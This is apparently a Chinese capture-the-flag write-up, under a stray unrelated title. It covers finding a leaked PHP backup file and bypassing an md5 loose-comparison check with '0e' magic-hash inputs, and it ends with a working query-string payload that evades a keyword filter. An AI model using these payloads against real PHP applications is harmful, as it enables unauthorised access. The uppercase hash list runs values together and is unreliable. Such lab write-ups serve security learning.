揭阳市榕城区建设局网站整屏网站模板

##解题思路

首先看到题目说备份是个好习惯，说明可能存在备份文件泄露

用dirsearch或者其他的目录扫描工具扫一扫，发现两个网址状态码正常，其中一个刚好是.bak的备份文件

至于flag文件，无法读取源码，都是空的

下载备份文件后，得到一串后端的逻辑

逻辑如下：

1. 用 include_once 语句包含 "flag.php" 文件。该文件应包含变量 $flag，用于存储标志（flag）

1. ini_set函数表示将 PHP 的错误显示设置为 0，即不显示错误信息

1. 代码从 $_SERVER['REQUEST_URI'] 中获取 URL 的参数部分，去掉第一个字符 ?

1. 用 str_replace 函数将参数中的 ’key’ 替换为空字符串。接着使用 parse_str 函数将参数解析为变量。

1. 用 md5 函数对 $key1 和 $key2 进行哈希运算，并通过echo语句输出结果。

1. 用条件语句判断 $key1 和 $key2 的哈希值是否相等，且 $key1、$key2不相等。

2. 如满足条件，则通过 echo 语句输出 $flag 变量的值和一段文字

<?php
/*** Created by PhpStorm.* User: Norse* Date: 2017/8/6* Time: 20:22
*/
​
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);
​
echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){echo $flag."取得flag";
}
?>

那么知道规则了就应该知道怎么绕过了，这就需要用到php的弱类型比较，这里是网上常见的输入值和md5值

纯数字类：
s878926199a
0e545993274517709034328855841020
​
s155964671a
0e342768416822451524974117254469
​
s214587387a
0e848240448830537924465865611904
​
s214587387a
0e848240448830537924465865611904
​
s878926199a
0e545993274517709034328855841020
​
s1091221200a
0e940624217856561557816327384675
​
s1885207154a
0e509367213418206700842008763514
​
s1502113478a
0e861580163291561247404381396064
​
s1885207154a
0e509367213418206700842008763514
​
s1836677006a
0e481036490867661113260034900752
​
s155964671a
0e342768416822451524974117254469
​
s1184209335a
0e072485820392773389523109082030
​
s1665632922a
0e731198061491163073197128363787
​
s1502113478a
0e861580163291561247404381396064
​
s1836677006a
0e481036490867661113260034900752
​
s1091221200a
0e940624217856561557816327384675
​
s155964671a
0e342768416822451524974117254469
​
s1502113478a
0e861580163291561247404381396064
​
s155964671a
0e342768416822451524974117254469
​
s1665632922a
0e731198061491163073197128363787
​
s155964671a
0e342768416822451524974117254469
​
s1091221200a
0e940624217856561557816327384675
​
s1836677006a
0e481036490867661113260034900752
​
s1885207154a
0e509367213418206700842008763514
​
s532378020a
0e220463095855511507588041205815
​
s878926199a
0e545993274517709034328855841020
​
s1091221200a
0e940624217856561557816327384675
​
s214587387a
0e848240448830537924465865611904
​
s1502113478a
0e861580163291561247404381396064
​
s1091221200a
0e940624217856561557816327384675
​
s1665632922a
0e731198061491163073197128363787
​
s1885207154a
0e509367213418206700842008763514
​
s1836677006a
0e481036490867661113260034900752
​
s1665632922a
0e731198061491163073197128363787
​
s878926199a
0e545993274517709034328855841020大写字母类：
QLTHNDT
0e405967825401955372549139051580QNKCDZO
0e830400451993494058024219903391EEIZDOI
0e782601363539291779881938479162TUFEPMC
0e839407194569345277863905212547UTIPEZQ
0e382098788231234954670291303879UYXFLOI
0e552539585246568817348686838809IHKFRNS
0e256160682445802696926137988570PJNPDWY
0e291529052894702774557631701704ABJIHVY
0e755264355178451322893275696586DQWRASX
0e742373665639232907775599582643DYAXWCA
0e424759758842488633464374063001GEGHBXL
0e248776895502908863709684713578GGHMVOE
0e362766013028313274586933780773GZECLQZ
0e537612333747236407713628225676NWWKITQ
0e763082070976038347657360817689NOOPCJF
0e818888003657176127862245791911MAUXXQC
0e478478466848439040434801845361MMHUWUV
0e701732711630150438129209816536

接下来就是自由组合环节，随便哪个payload都可以kkeyey1=s878926199a&kkeyey2=s155964671a